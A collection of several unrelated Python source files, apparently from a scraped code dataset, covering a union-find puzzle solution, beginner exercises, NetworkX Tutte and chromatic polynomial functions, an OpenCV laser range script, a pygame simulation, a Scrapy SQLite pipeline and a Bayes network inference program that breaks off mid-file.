self.parent_size[ a]= self. leader(self. parent_size[ a])
return self. parent_size[ a]
def size( self, a):
return abs(self.parent_size[ self.leader( a)])
def groups( self):
result =[[] for _ in range( self. n)]
for i in range( self. n):
result[ self. leader( i)]. append( i)
return [r for r in result if r != []]
N, M = map(int, input().split())
Uni = UnionFind(N)
for i in range(M):
A,B = map(lambda a: int(a)-1, input().split())
Uni.merge(A,B)
#print(Uni.groups())
print(max([len(g) for g in Uni.groups()]))
| true |
38044289ca5ade4e7637ce4d7efdc7b4a96a38f3 | Python | DiksonSantos/Curso_Do_Guanabara | /Aula_16_Exercicios_.py | UTF-8 | 1,433 | 3.828125 | 4 | [] | no_license | #Exercicio 072:
'''
#print("Digite Quit Para Sair")
Num_Strings = ('Zero', "Um", "Dois", "Três", 'Quatro',
"Cinco", 'Seis', 'Sete', 'Oito', 'Nove', 'Dez')
while True:
Numero = int(input("Digite Numero: ")) # Aqui precisa ser INT para ele usar de Indice.
#O bloco a baixo é p/ o prog Não dar pau caso digite Numero que não consta no Indice.
#if 0<= Numero and Numero <= 10: #pARA MIN não fAZ sENTIDO
if 0< Numero and Numero <= 10: # Fuleragem....
break
print("Try Again")
'''
#for i in range (len(Num_Strings)):
# if Numero in Num_Strings[i]:
# if Numero == 1:
'''
#Ao Inves de pedir p ele procurar dentro da tupla para então comparar,
#com o metodo a baixo ele tem o numero que for digitado como Indice da Tupla
#e o exibe.
#print("Você Digitou: " + Num_Strings[Numero]) #Usa o numero Digitado Como Indice.
'''
#CONCORDO COM A SOLUÇÃO A BAIXO. AS MOSTRADAS ATÉ MESMO PELO GUANABARA NÃO FAZ SENTIDO P MIN:
extenso = ('zero', 'um', 'dois', 'tres','quatro','cinco','seis','sete', 'oito', 'nove', 'dez', 'onze', 'doze', 'treze',
'quatorze', 'quinze', 'dezesseis', 'dezessete', 'dezoito', 'dezenove', 'vinte')
numero = int(input('digite um numero de 0 a 20:: '))
while numero > 20 or numero < 0:
numero = int(input('numero errrado! digite um numero de 0 a 20 : '))
print(f'O Numero é{extenso[numero]}')
| true |
832f04862aaa2b2417ed323e46bd900c193af480 | Python | dkratzert/DSR | /src/dsr_shelx/networkx/algorithms/polynomials.py | UTF-8 | 10,714 | 3.859375 | 4 | [] | no_license | """Provides algorithms supporting the computation of graph polynomials.
Graph polynomials are polynomial-valued graph invariants that encode a wide
variety of structural information. Examples include the Tutte polynomial,
chromatic polynomial, characteristic polynomial, and matching polynomial. An
extensive treatment is provided in [1]_.
.. [1] Y. Shi, M. Dehmer, X. Li, I. Gutman,
"Graph Polynomials"
"""
from collections import deque
import networkx as nx
from networkx.utils import not_implemented_for
__all__ = ["tutte_polynomial", "chromatic_polynomial"]
@not_implemented_for("directed")
def tutte_polynomial(G):
r"""Returns the Tutte polynomial of `G`
This function computes the Tutte polynomial via an iterative version of
the deletion-contraction algorithm.
The Tutte polynomial `T_G(x, y)` is a fundamental graph polynomial invariant in
two variables. It encodes a wide array of information related to the
edge-connectivity of a graph; "Many problems about graphs can be reduced to
problems of finding and evaluating the Tutte polynomial at certain values" [1]_.
In fact, every deletion-contraction-expressible feature of a graph is a
specialization of the Tutte polynomial [2]_ (see Notes for examples).
There are several equivalent definitions; here are three:
Def 1 (rank-nullity expansion): For `G` an undirected graph, `n(G)` the
number of vertices of `G`, `E` the edge set of `G`, `V` the vertex set of
`G`, and `c(A)` the number of connected components of the graph with vertex
set `V` and edge set `A` [3]_:
.. math::
T_G(x, y) = \sum_{A \in E} (x-1)^{c(A) - c(E)} (y-1)^{c(A) + |A| - n(G)}
Def 2 (spanning tree expansion): Let `G` be an undirected graph, `T` a spanning
tree of `G`, and `E` the edge set of `G`. Let `E` have an arbitrary strict
linear order `L`. Let `B_e` be the unique minimal nonempty edge cut of
$E \setminus T \cup {e}$. An edge `e` is internally active with respect to
`T` and `L` if `e` is the least edge in `B_e` according to the linear order
`L`. The internal activity of `T` (denoted `i(T)`) is the number of edges
in $E \setminus T$ that are internally active with respect to `T` and `L`.
Let `P_e` be the unique path in $T \cup {e}$ whose source and target vertex
are the same. An edge `e` is externally active with respect to `T` and `L`
if `e` is the least edge in `P_e` according to the linear order `L`. The
external activity of `T` (denoted `e(T)`) is the number of edges in
$E \setminus T$ that are externally active with respect to `T` and `L`.
Then [4]_ [5]_:
.. math::
T_G(x, y) = \sum_{T \text{ a spanning tree of } G} x^{i(T)} y^{e(T)}
Def 3 (deletion-contraction recurrence): For `G` an undirected graph, `G-e`
the graph obtained from `G` by deleting edge `e`, `G/e` the graph obtained
from `G` by contracting edge `e`, `k(G)` the number of cut-edges of `G`,
and `l(G)` the number of self-loops of `G`:
.. math::
T_G(x, y) = \begin{cases}
x^{k(G)} y^{l(G)}, & \text{if all edges are cut-edges or self-loops} \\
T_{G-e}(x, y) + T_{G/e}(x, y), & \text{otherwise, for an arbitrary edge $e$ not a cut-edge or loop}
\end{cases}
Parameters
----------
G : NetworkX graph
Returns
-------
instance of `sympy.core.add.Add`
A Sympy expression representing the Tutte polynomial for `G`.
Examples
--------
>>> C = nx.cycle_graph(5)
>>> nx.tutte_polynomial(C)
x**4 + x**3 + x**2 + x + y
>>> D = nx.diamond_graph()
>>> nx.tutte_polynomial(D)
x**3 + 2*x**2 + 2*x*y + x + y**2 + y
Notes
-----
Some specializations of the Tutte polynomial:
- `T_G(1, 1)` counts the number of spanning trees of `G`
- `T_G(1, 2)` counts the number of connected spanning subgraphs of `G`
- `T_G(2, 1)` counts the number of spanning forests in `G`
- `T_G(0, 2)` counts the number of strong orientations of `G`
- `T_G(2, 0)` counts the number of acyclic orientations of `G`
Edge contraction is defined and deletion-contraction is introduced in [6]_.
Combinatorial meaning of the coefficients is introduced in [7]_.
Universality, properties, and applications are discussed in [8]_.
Practically, up-front computation of the Tutte polynomial may be useful when
users wish to repeatedly calculate edge-connectivity-related information
about one or more graphs.
References
----------
.. [1] M. Brandt,
"The Tutte Polynomial."
Talking About Combinatorial Objects Seminar, 2015
https://math.berkeley.edu/~brandtm/talks/tutte.pdf
.. [2] A. Björklund, T. Husfeldt, P. Kaski, M. Koivisto,
"Computing the Tutte polynomial in vertex-exponential time"
49th Annual IEEE Symposium on Foundations of Computer Science, 2008
https://ieeexplore.ieee.org/abstract/document/4691000
.. [3] Y. Shi, M. Dehmer, X. Li, I. Gutman,
"Graph Polynomials," p. 14
.. [4] Y. Shi, M. Dehmer, X. Li, I. Gutman,
"Graph Polynomials," p. 46
.. [5] A. Nešetril, J. Goodall,
"Graph invariants, homomorphisms, and the Tutte polynomial"
https://iuuk.mff.cuni.cz/~andrew/Tutte.pdf
.. [6] D. B. West,
"Introduction to Graph Theory," p. 84
.. [7] G. Coutinho,
"A brief introduction to the Tutte polynomial"
Structural Analysis of Complex Networks, 2011
https://homepages.dcc.ufmg.br/~gabriel/seminars/coutinho_tuttepolynomial_seminar.pdf
.. [8] J. A. Ellis-Monaghan, C. Merino,
"Graph polynomials and their applications I: The Tutte polynomial"
Structural Analysis of Complex Networks, 2011
https://arxiv.org/pdf/0803.3079.pdf
"""
import sympy
x = sympy.Symbol("x")
y = sympy.Symbol("y")
stack = deque()
stack.append(nx.MultiGraph(G))
polynomial = 0
while stack:
G = stack.pop()
bridges = set(nx.bridges(G))
e = None
for i in G.edges:
if (i[0], i[1]) not in bridges and i[0] != i[1]:
e = i
break
if not e:
loops = list(nx.selfloop_edges(G, keys=True))
polynomial += x ** len(bridges) * y ** len(loops)
else:
# deletion-contraction
C = nx.contracted_edge(G, e, self_loops=True)
C.remove_edge(e[0], e[0])
G.remove_edge(*e)
stack.append(G)
stack.append(C)
return sympy.simplify(polynomial)
@not_implemented_for("directed")
def chromatic_polynomial(G):
r"""Returns the chromatic polynomial of `G`
This function computes the chromatic polynomial via an iterative version of
the deletion-contraction algorithm.
The chromatic polynomial `X_G(x)` is a fundamental graph polynomial
invariant in one variable. Evaluating `X_G(k)` for an natural number `k`
enumerates the proper k-colorings of `G`.
There are several equivalent definitions; here are three:
Def 1 (explicit formula):
For `G` an undirected graph, `c(G)` the number of connected components of
`G`, `E` the edge set of `G`, and `G(S)` the spanning subgraph of `G` with
edge set `S` [1]_:
.. math::
X_G(x) = \sum_{S \subseteq E} (-1)^{|S|} x^{c(G(S))}
Def 2 (interpolating polynomial):
For `G` an undirected graph, `n(G)` the number of vertices of `G`, `k_0 = 0`,
and `k_i` the number of distinct ways to color the vertices of `G` with `i`
unique colors (for `i` a natural number at most `n(G)`), `X_G(x)` is the
unique Lagrange interpolating polynomial of degree `n(G)` through the points
`(0, k_0), (1, k_1), \dots, (n(G), k_{n(G)})` [2]_.
Def 3 (chromatic recurrence):
For `G` an undirected graph, `G-e` the graph obtained from `G` by deleting
edge `e`, `G/e` the graph obtained from `G` by contracting edge `e`, `n(G)`
the number of vertices of `G`, and `e(G)` the number of edges of `G` [3]_:
.. math::
X_G(x) = \begin{cases}
x^{n(G)}, & \text{if $e(G)=0$} \\
X_{G-e}(x) - X_{G/e}(x), & \text{otherwise, for an arbitrary edge $e$}
\end{cases}
This formulation is also known as the Fundamental Reduction Theorem [4]_.
Parameters
----------
G : NetworkX graph
Returns
-------
instance of `sympy.core.add.Add`
A Sympy expression representing the chromatic polynomial for `G`.
Examples
--------
>>> C = nx.cycle_graph(5)
>>> nx.chromatic_polynomial(C)
x**5 - 5*x**4 + 10*x**3 - 10*x**2 + 4*x
>>> G = nx.complete_graph(4)
>>> nx.chromatic_polynomial(G)
x**4 - 6*x**3 + 11*x**2 - 6*x
Notes
-----
Interpretation of the coefficients is discussed in [5]_. Several special
cases are listed in [2]_.
The chromatic polynomial is a specialization of the Tutte polynomial; in
particular, `X_G(x) = `T_G(x, 0)` [6]_.
The chromatic polynomial may take negative arguments, though evaluations
may not have chromatic interpretations. For instance, `X_G(-1)` enumerates
the acyclic orientations of `G` [7]_.
References
----------
.. [1] D. B. West,
"Introduction to Graph Theory," p. 222
.. [2] E. W. Weisstein
"Chromatic Polynomial"
MathWorld--A Wolfram Web Resource
https://mathworld.wolfram.com/ChromaticPolynomial.html
.. [3] D. B. West,
"Introduction to Graph Theory," p. 221
.. [4] J. Zhang, J. Goodall,
"An Introduction to Chromatic Polynomials"
https://math.mit.edu/~apost/courses/18.204_2018/Julie_Zhang_paper.pdf
.. [5] R. C. Read,
"An Introduction to Chromatic Polynomials"
Journal of Combinatorial Theory, 1968
https://math.berkeley.edu/~mrklug/ReadChromatic.pdf
.. [6] W. T. Tutte,
"Graph-polynomials"
Advances in Applied Mathematics, 2004
https://www.sciencedirect.com/science/article/pii/S0196885803000411
.. [7] R. P. Stanley,
"Acyclic orientations of graphs"
Discrete Mathematics, 2006
https://math.mit.edu/~rstan/pubs/pubfiles/18.pdf
"""
import sympy
x = sympy.Symbol("x")
stack = deque()
stack.append(nx.MultiGraph(G, contraction_idx=0))
polynomial = 0
while stack:
G = stack.pop()
edges = list(G.edges)
if not edges:
polynomial += (-1) ** G.graph["contraction_idx"] * x ** len(G)
else:
e = edges[0]
C = nx.contracted_edge(G, e, self_loops=True)
C.graph["contraction_idx"] = G.graph["contraction_idx"] + 1
C.remove_edge(e[0], e[0])
G.remove_edge(*e)
stack.append(G)
stack.append(C)
return polynomial
| true |
db3483a411de0a6022d67adedde8b344d3f39754 | Python | D3Rnatch/TestPhabricator | /Sources/Tests/Scanner laser/test_algo.py | UTF-8 | 2,135 | 3.03125 | 3 | [] | no_license | # Import some lib
import cv2
import numpy as np
# Load base image
image = cv2.imread('200cm.jpg')
# cv2.imshow('base_image', image)
# cv2.waitKey(0)
# turn to hsv value
# hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
lower_red = np.array([0, 0, 100])
upper_red = np.array([255, 255, 255])
# get hue
b, g, r = cv2.split(image)
# cv2.imshow('Red', r)
# cv2.imshow('Blue', b)
# cv2.imshow('Green', g)
# cv2.waitKey(0)
# build the mask
mask = cv2.inRange(image, lower_red, upper_red)
# ret, mask = cv2.threshold(h, 120, 255, cv2.THRESH_BINARY)
# mask = cv2.inRange(h, 120, 130, cv2.THRESH_BINARY)
# Show the mask
#cv2.imshow('mask', mask)
#cv2.waitKey(0)
# Try to get a better mask
rows, col = mask.shape
pos2 = 0
distance = 0
for i in xrange(rows):
compteur = 0
pos = 0
for j in xrange(col):
k = mask.item(i, j)
if k==255:
compteur = compteur + 1
pos = pos + j
mask.itemset((i, j), 0)
if compteur != 0:
moy = pos/compteur
mask.itemset((i, moy), 255)
if i == 1000:
distance = ((1210000)/(((moy*1.4)/1000)*1500-1575))/10
pos2 = moy
# Show the mask
# cv2.imshow('mask 2', mask)
# cv2.waitKey(0)
# Get the distance
#rows, col = mask.shape
#for i in xrange(col):
# k = mask.item(10, i)
# if k == 255:
# distance = ((1210000)/(((i*1.4)/1000)*1500-1575))/10
# Edge mask
# edge_mask = cv2.Canny(image,5, 100)
# cv2.imshow('edges', edge_mask)
# cv2.waitKey(0)
# mix both mask
# mix_mask = cv2.bitwise_and(edge_mask, mask)
# cv2.imshow('mixed mask', mix_mask)
# cv2.waitKey(0)
# find lines
#lines = cv2.HoughLinesP(mask, 1, np.pi/180, 5, minLineLength= 10, maxLineGap= 5)
#for x1,y1,x2,y2 in lines[0]:
# cv2.line(image,(x1,y1),(x2,y2),(0,255,0),2)
print str(pos)
cv2.circle(image, (pos2,1000), 10, (0, 255, 0), 3, cv2.CV_AA)
cv2.putText(image, str(distance) + 'cm', (pos2+15, 1000), cv2.FONT_HERSHEY_SIMPLEX, 4,(255,255,255),2, cv2.CV_AA)
# cv2.imwrite("Pos_300.jpg", image)
cv2.imshow('Lines 3', cv2.resize(image, (0, 0), fx=0.3, fy=0.3))
cv2.waitKey(0)
cv2.destroyAllWindows()
| true |
71a3935f00c2470a072926fa1f9e58c29ae524d5 | Python | manojmpg114/Python | /Python Statements/list_comprehensions.py | UTF-8 | 1,724 | 4.15625 | 4 | [] | no_license | mystring = "Hello"
mylist = []
for letter in mystring:
mylist.append(letter)
print(mylist)
# format of list comphresension means we can do this in a single line / with less fluff
mylist = [letter for letter in mystring]
print(mylist)
mylist = [x for x in 'word'] #as long as the x is the same object name it would work
print(mylist)
mylist = [x for x in range(0,11)]
print(mylist)
mylist = [x**2 for x in range(0,11)] #now we are doing the operation x squared for each element x in the range 0-11
print(mylist)
mylist = [x for x in range(0,11) if x%2 ==0] #in this case we are making an if statement in the loop to build the list
print(mylist)
celcius = [0, 10, 20, 34.5]
fahrenheit = [((9/5)*temp +32) for temp in celcius] #code 1 flattened version of append functionality in the loop; list comphrehension
print(fahrenheit)
#the long way to get the same result for fahrenheit is this:
fahrenheit = [] #block of code under this is the exact same as the portion referenced code 1 line 35
for temp in celcius:
fahrenheit.append(((9/5)*temp + 32))
print(fahrenheit)
results = [x if x%2 == 0 else 'ODD' for x in range(0,11)] #writing it in this method might make it harder to read especially if you dont look at
#list comprehensions for months at a time
#this is an if else and you will notice that the if statement in this case is before the loop while in previous appending cases
#the if condition was after the loop; again can be confusing and if it does become so its not worth doing a if else one liner
print(results)
mylist = []
for x in [2,4,6]:
for y in [100,200,300]:
mylist.append(x*y)
print(mylist)
mylist = [x*y for x in [2,4,6] for y in [1,10,1000]]
print(mylist) | true |
2e7ea796e9ea60244e4e5e4e374a1be57a392c74 | Python | Reader6/WebRead | /Novelspider/Novels/Novelspider/Novelspider/pipelines.py | UTF-8 | 1,890 | 2.65625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# import json
# class NovelspiderPipeline(object):
# def __init__(self):
# self.f = open("novel.json", "w")
#
# def process_item(self, item, spider):
# content = json.dumps(dict(item),ensure_ascii=False) + ',\n'
# self.f.write(content)
# return item
#
# def close_spider(self,spider):
# self.f.close()
# 爬取到的数据写入到SQLite数据库
import sqlite3
class NovelspiderPipeline(object):
# 打开数据库
def open_spider(self, spider):
db_name = spider.settings.get('SQLITE_DB_NAME', 'novel_info.db')
self.db_conn = sqlite3.connect(db_name)
self.db_cur = self.db_conn.cursor()
# 关闭数据库
def close_spider(self, spider):
self.db_conn.commit()
self.db_conn.close()
#对数据进行处理
def process_item(self, item, spider):
self.insert_db(item,spider)
return item
#插入数据
def insert_db(self, item, spider):
values = (
str(item['novel_name']),
str(item['novel_author']),
str(item['novel_img']),
str(item['novel_type']),
str(item['novel_des']),
str(item['novel_date']),
str(item['novel_start']),
)
if spider.name=='xianxia':
sql = 'INSERT INTO XIANXIA VALUES(?,?,?,?,?,?,?)'
elif spider.name=='lishi':
sql = 'INSERT INTO LISHI VALUES(?,?,?,?,?,?,?)'
elif spider.name=='kehuan':
sql = 'INSERT INTO KEHUAN VALUES(?,?,?,?,?,?,?)'
elif spider.name=='wangyou':
sql = 'INSERT INTO WANGYOU VALUES(?,?,?,?,?,?,?)'
self.db_cur.execute(sql, values) | true |
a02b6eeee7869206a4ded3c2fa2221dfefb6d084 | Python | aditshinde/python-training | /day-1-handson/armstrong.py | UTF-8 | 226 | 3.859375 | 4 | [
"Apache-2.0"
] | permissive | ## TODO: Do for all numbers.
a = 153
n = len(str(a))
addn = 0
for i in list(str(a)): # ['1', '5', '3']
addn = addn + int(i)**n;
if addn == a:
print(a, " is Armstrong number")
else:
print(a, " is not Armstrong number") | true |
fd9ef283d4462106764aac750a7b7121f18308d6 | Python | AcisAce/My-Python-Projects | /Python Projects/Predprey/Beta.py | UTF-8 | 2,591 | 3.21875 | 3 | [] | no_license | #Author=AcisAce
import pygame
import math
import random
## Welcome to the predprey simulation program
(width,height)=(800,400) #Window properties
screen=pygame.display.set_mode((width,height)) #Display Settings
screen.fill((255,255,255))
sizePred=20 #Sizes in pixels
sizePrey=10
velPred=1
velPrey=0.01
colorRand=[(255,0,128),(0,255,200),(0,128,255)] #Three random colors
#------------------------------------------------------------------------------------Predator Initialization
class Predator(object):
def __init__(self,x,y,color):
self.x=x
self.y=y
self.color=color
self.angle=random.uniform(0,2*math.pi)
self.velx=velPred
self.vely=velPred
def drawPred(self):
pygame.draw.circle(screen,self.color,(self.x,self.y),sizePred,4)
def move(self):
self.x=int(self.x+self.velx)
self.y=int(self.y+self.vely)
def bounce(self):
if self.x<=sizePred or self.x>=width-sizePred:
self.velx=-self.velx
if self.y<=sizePred or self.y>=height-sizePred:
self.vely=-self.vely
def detect(self):
predatorCount=1 #Set Number of predators
listPredators=[]
for i in range(predatorCount):
xRand=random.randint(sizePred,width-sizePred)
yRand=random.randint(sizePred,height-sizePred)
colRand=random.choice(colorRand)
listPredators.append(Predator(xRand,yRand,colRand))
#-------------------------------------------------------------------------------------Prey Initialization
class Prey(object):
def __init__(self,x,y,color):
self.x=x
self.y=y
self.color=color
def drawPrey(self):
pygame.draw.circle(screen,self.color,(self.x,self.y),sizePrey,2)
preyCount=30 #Set number of prey organisms
listPrey=[]
for i in range(preyCount):
xRand=random.randint(sizePrey,width-sizePrey)
yRand=random.randint(sizePrey,height-sizePrey)
colP=(0,0,0)
listPrey.append(Prey(xRand,yRand,colP))
for predator in listPredators:
predator.drawPred()
for prey in listPrey:
prey.drawPrey()
running=True
while running: #Main Game Loop
for event in pygame.event.get():
if event.type==pygame.QUIT:
running=False
pygame.quit()
screen.fill((255,255,255))
for predator in listPredators:
predator.bounce()
predator.move()
predator.drawPred()
for prey in listPrey:
prey.drawPrey()
pygame.display.flip()
| true |
81757e027c0c9e9a67b6f083754967a1900b8bfb | Python | luguannan/Artificial-Intelligence | /HW3/BayesNet.py | UTF-8 | 17,380 | 3.0625 | 3 | [] | no_license |
class ProbDist:
def __init__(self, varname, freqs=None):
self.prob = {}
self.varname = varname
self.values = []
if freqs:
for (v, p) in freqs.items():
self[v] = p
self.normalize()
def __getitem__(self, val):
"Given a value, return P(value)."
try:
return self.prob[val]
except KeyError:
return 0
def __setitem__(self, val, p):
"Set P(val) = p."
if val not in self.values:
self.values.append(val)
self.prob[val] = p
def normalize(self):
total = sum(self.prob.values())
if total != 1:
for val in self.prob:
self.prob[val] /= total
return self
def show_approx(self, numfmt='%.2g'):
"""Show the probabilities rounded and sorted by key, for the
sake of portable doctests."""
return ', '.join([('%s: ' + numfmt) % (v, p)
for (v, p) in sorted(self.prob.items())])
def __repr__(self):
return "P(%s)" % self.varname
# ______________________________________________________________________________
class BayesNet:
def __init__(self, node_specs = []):
"nodes ordered with parents before children."
self.nodes = []
self.chance_vars = []
self.decision_vars = []
self.utility_vars = []
self.variables = []
for node_spec in node_specs:
self.add(node_spec)
def add(self, node_spec):
node = BayesNode(*node_spec)
assert node.variable not in self.variables
assert all((parent in self.variables) for parent in node.parents)
self.nodes.append(node)
if node.kind == 'chance':
self.chance_vars.append(node.variable)
self.variables.append(node.variable)
elif node.kind == 'decision':
self.decision_vars.append(node.variable)
self.variables.append(node.variable)
elif node.kind == 'utility':
self.utility_vars.append(node.variable)
for parent in node.parents:
self.variable_node(parent).children.append(node)
def variable_node(self, var):
for n in self.nodes:
if n.variable == var:
return n
raise Exception("Don't have that variable: %s" % var)
def variable_values(self, var):
return [True, False]
def __repr__(self):
return 'BayesNet(%r)' % self.nodes
# ______________________________________________________________________________
class BayesNode:
def __init__(self, kind, X, parents, cpt):
if kind == 'chance':
if isinstance(parents, str):
parents = parents.split()
if isinstance(cpt, (float,int)):
cpt = {(): cpt}
elif isinstance(cpt, dict):
if cpt and isinstance(list(cpt.keys())[0], bool):
cpt = {(v,): p for v, p in cpt.items()}
assert isinstance(cpt, dict)
for vs, p in cpt.items():
assert isinstance(vs, tuple) and len(vs) == len(parents)
assert all(isinstance(v, bool) for v in vs)
assert 0 <= p <= 1
self.kind = 'chance'
self.variable = X
self.parents = parents
self.cpt = cpt
self.children = []
elif kind == 'decision':
if isinstance(parents, str):
parents = parents.split()
self.kind = 'decision'
self.variable = X
self.parents = parents
self.children = []
elif kind == 'utility':
if isinstance(parents, str):
parents = parents.split()
if isinstance(cpt, dict):
if cpt and isinstance(list(cpt.keys())[0], bool):
cpt = {(v,): p for v, p in cpt.items()}
assert isinstance(cpt, dict)
for vs, p in cpt.items():
assert isinstance(vs, tuple) and len(vs) == len(parents)
assert all(isinstance(v, bool) for v in vs)
self.kind = 'utility'
self.variable = X
self.parents = parents
self.cpt = cpt
self.children = []
def p(self, value, event):
assert isinstance(value, bool)
ptrue = self.cpt[event_values(event, self.parents)]
if value is True:
return ptrue
else:
return 1 - ptrue
def __repr__(self):
return repr((self.variable, ' '.join(self.parents)))
# ______________________________________________________________________________
def enumeration_ask(X, e, bn):
assert X not in e, "Query variable must be distinct from evidence"
Q = ProbDist(X)
for xi in bn.variable_values(X):
Q[xi] = enumerate_all(bn.variables, extend(e, X, xi), bn)
return Q.normalize()
def enumerate_all(variables, e, bn):
if not variables:
return 1.0
Y, rest = variables[0], variables[1:]
Ynode = bn.variable_node(Y)
if Y in e:
return Ynode.p(e[Y], e) * enumerate_all(rest, e, bn)
else:
return sum(Ynode.p(y, e) * enumerate_all(rest, extend(e, Y, y), bn)
for y in bn.variable_values(Y))
# ______________________________________________________________________________
class Factor:
def __init__(self, variables, cpt):
self.variables = variables
self.cpt = cpt
def pointwise_product(self, other, bn):
"Combine two factors."
variables = list(set(self.variables) | set(other.variables))
cpt = {event_values(e, variables): self.p(e) * other.p(e)
for e in all_events(variables, bn, {})}
return Factor(variables, cpt)
def sum_out(self, var, bn):
"Eliminating var of factor."
variables = [X for X in self.variables if X != var]
cpt = {event_values(e, variables): sum(self.p(extend(e, var, val))
for val in bn.variable_values(var))
for e in all_events(variables, bn, {})}
return Factor(variables, cpt)
def normalize(self):
"Return my probabilities; must be down to one variable."
#assert len(self.variables) == 1
return ProbDist(self.variables,
{k: v for k, v in self.cpt.items()})
def p(self, e):
"Look up my value tabulated for e."
return self.cpt[event_values(e, self.variables)]
def elimination_ask(X, e, bn):
for x in X:
assert x not in e
for ed in e:
if ed in bn.decision_vars:
node = bn.variable_node(ed)
if e[ed] is True:
node.cpt = {(): 1}
else:
node.cpt = {(): 0}
factors = []
for var in reversed(bn.variables):
factors.append(make_factor(var, e, bn))
if is_hidden(var, X, e):
factors = sum_out(var, factors, bn)
return pointwise_product(factors, bn).normalize()
def adjust_seq(a, b):
list_temp = []
for name in a:
for i in range(len(b)):
if name == b[i]:
list_temp.append(i)
return list_temp
def elimination_ask_utility(e, bn):
utility_node = bn.variable_node('utility')
tmp = [val for val in utility_node.parents if val not in e]
tmp2 = [val for val in utility_node.parents if val in e]
Prob = elimination_ask(tmp, e, bn)
sum = 0
list_temp = [True] * len(utility_node.parents)
for x in tmp2:
for i in range(len(utility_node.parents)):
if utility_node.parents[i] == x:
list_temp[i] = e[x]
for y in Prob.prob:
for i in range(len(Prob.varname)):
for j in range(len(utility_node.parents)):
if Prob.varname[i] == utility_node.parents[j]:
list_temp[j] = y[i]
t = tuple(list_temp)
sum += Prob.prob[y] * utility_node.cpt[t]
return sum
def elimination_ask_max_utility(X, e, bn):
e_max = {}
max = -10000000
for e1 in all_events(X, bn, e):
value = elimination_ask_utility(e1, bn)
if value > max:
e_max = e1
max = value
result = []
for x in e_max:
if x in e:
pass
elif e_max[x] == True:
result.append('+')
elif e_max[x] == False:
result.append('-')
else:
print 'Something wrong'
result.append(str(int(round(max))))
return ' '.join(result)
def elimination_ask_kinds(q, bn):
if q.type == 'P':
result = elimination_ask(q.X, q.e, bn)
varname = result.varname
seq = adjust_seq(varname, q.X)
list_temp = []
for i in seq:
list_temp.append(q.value[i])
t = tuple(list_temp)
return '%.2f' % result[t]
elif q.type == 'EU':
return str(int(round(elimination_ask_utility(q.e, bn))))
elif q.type == 'MEU':
return elimination_ask_max_utility(q.X, q.e, bn)
def is_hidden(var, X, e):
return var not in X and var not in e
def make_factor(var, e, bn):
"""Return the factor for var in bn's joint distribution given e.
That is, bn's full joint distribution, projected to accord with e,
is the pointwise product of these factors for bn's variables."""
node = bn.variable_node(var)
variables = [X for X in [var] + node.parents if X not in e]
cpt = {event_values(e1, variables): node.p(e1[var], e1)
for e1 in all_events(variables, bn, e)}
return Factor(variables, cpt)
def pointwise_product(factors, bn):
return reduce(lambda f, g: f.pointwise_product(g, bn), factors)
def sum_out(var, factors, bn):
"Eliminate var from all factors by summing over its values."
result, var_factors = [], []
for f in factors:
(var_factors if var in f.variables else result).append(f)
result.append(pointwise_product(var_factors, bn).sum_out(var, bn))
return result
def event_values(event, variables):
if isinstance(event, tuple) and len(event) == len(variables):
return event
else:
return tuple([event[var] for var in variables])
def extend(s, var, val):
"Copy the substitution s and extend it by setting var to val; return copy."
s2 = s.copy()
s2[var] = val
return s2
def all_events(variables, bn, e):
"Yield every way of extending e with values for all variables."
if not variables:
yield e
else:
X, rest = variables[0], variables[1:]
for e1 in all_events(rest, bn, e):
for x in bn.variable_values(X):
yield extend(e1, X, x)
# ______________________________________________________________________________
class Query():
def __init__(self, type, X, value, e):
self.type = type
self.X = X
self.value = value
self.e = e
def readfile():
Querys = []
BayesNet = []
with open('input.txt', 'r') as infile:
lines = infile.readlines()
for i in xrange(len(lines)):
lines[i] = lines[i].strip('\n')
line_num = 0
while lines[line_num] != '******':
X = []
value = []
e = {}
if lines[line_num][0] == 'P':
items = lines[line_num][1:].strip('\n').strip('(').strip(')').split(' ')
for i in range(len(items)):
items[i] = items[i].strip(',')
index = 0
while index < len(items) and items[index] is not '|':
X.append(items[index])
if items[index + 2] is '+':
value.append(True)
elif items[index + 2] is '-':
value.append(False)
else:
print 'input wrong'
index += 3
if index < len(items) and items[index] is '|':
index += 1
while index < len(items):
if items[index + 2] == '+':
e[items[index]] = True
elif items[index + 2] == '-':
e[items[index]] = False
else:
print 'input wrong'
index += 3
Querys.append(Query('P',X,value,e))
elif lines[line_num][0:2] == 'EU':
items = lines[line_num][2:].strip('\n').strip('(').strip(')').split(' ')
for i in range(len(items)):
items[i] = items[i].strip(',')
index = 0
while index < len(items) and items[index] is not '|':
if items[index + 2] is '+':
e[items[index]] = True
value.append(True)
elif items[index + 2] is '-':
e[items[index]] = False
else:
print 'input wrong'
index += 3
if index < len(items) and items[index] is '|':
index += 1
while index < len(items):
if items[index + 2] == '+':
e[items[index]] = True
elif items[index + 2] == '-':
e[items[index]] = False
else:
print 'input wrong'
index += 3
Querys.append(Query('EU', X, value, e))
elif lines[line_num][0:3] == 'MEU':
items = lines[line_num][3:].strip('\n').strip('(').strip(')').split(' ')
for i in range(len(items)):
items[i] = items[i].strip(',')
index = 0
while index < len(items) and items[index] is not '|':
X.append(items[index])
index += 1
if index < len(items) and items[index] is '|':
index += 1
while index < len(items):
if items[index + 2] == '+':
e[items[index]] = True
elif items[index + 2] == '-':
e[items[index]] = False
else:
print 'input wrong'
index += 3
Querys.append(Query('MEU', X, value, e))
line_num += 1
while line_num < len(lines) and (lines[line_num] == '***' or lines[line_num] == '******'):
line_num += 1
X = ''
parents = ''
cpt = {}
items = lines[line_num].split(' ')
if items[0] == 'utility':
X = items[0]
parents = ' '.join(items[2:])
line_num += 1
while line_num < len(lines) and lines[line_num] != '***' and lines[line_num] != '******':
prob_tab = lines[line_num].split(' ')
list_temp = []
for i in range(1, len(prob_tab)):
if prob_tab[i] == '+':
list_temp.append(True)
elif prob_tab[i] == '-':
list_temp.append(False)
else:
print 'input wrong'
t1 = ()
t1 = tuple(list_temp)
cpt[t1] = float(prob_tab[0])
line_num += 1
BayesNet.append(('utility', X, parents, cpt))
elif len(items) == 1:
X = items[0]
parents = ''
if lines[line_num + 1] == 'decision':
BayesNet.append(('decision', X, parents, cpt))
else:
cpt = {(): float(lines[line_num + 1])}
BayesNet.append(('chance', X, parents, cpt))
line_num += 2
else:
X = items[0]
parents = ' '.join(items[2:])
line_num += 1
